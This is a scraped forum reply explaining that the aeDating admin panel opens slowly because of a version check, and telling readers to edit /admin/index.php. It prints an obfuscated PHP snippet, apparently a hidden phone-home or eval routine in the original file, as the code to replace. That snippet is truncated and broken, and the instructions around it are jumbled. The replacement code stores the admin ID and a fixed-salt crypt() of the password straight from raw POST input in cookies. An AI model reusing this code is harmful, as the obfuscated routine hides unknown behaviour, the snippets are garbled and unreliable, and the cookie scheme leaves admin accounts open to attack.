The delay (or perhaps inability) to get into your admin panel is because the admin panel tries to check the latest version of aedating with the aedating website - and if their site is down or slow, this can cause delays in your admin panel opening.
Usually, if you simply wait a while, you can get into your admin panel.
Or you can remove this check from the admin.
To remove the check (and make your admin open faster all the time, even when the aeDating website is working), you need to replace some code in /admin/index.php
Find the code, around line 23;
and replace withCode:else { for ( $i = 0 ; $i < count($m[1]); ++$i ) {$ss .= sprintf("%c",$$ $sss = ss($m[2]); $ssss = $sss('$site', $ss($m[0])); $ssss($site); ?>
Code:else { setcookie ("adminID", $_POST[ID], 0, "/"); setcookie ("adminPassword", crypt( $_POST[Password], 'secret_string' ), 0, "/"); ?>


LinkBack URL
About LinkBacks



Reply With Quote
Bookmarks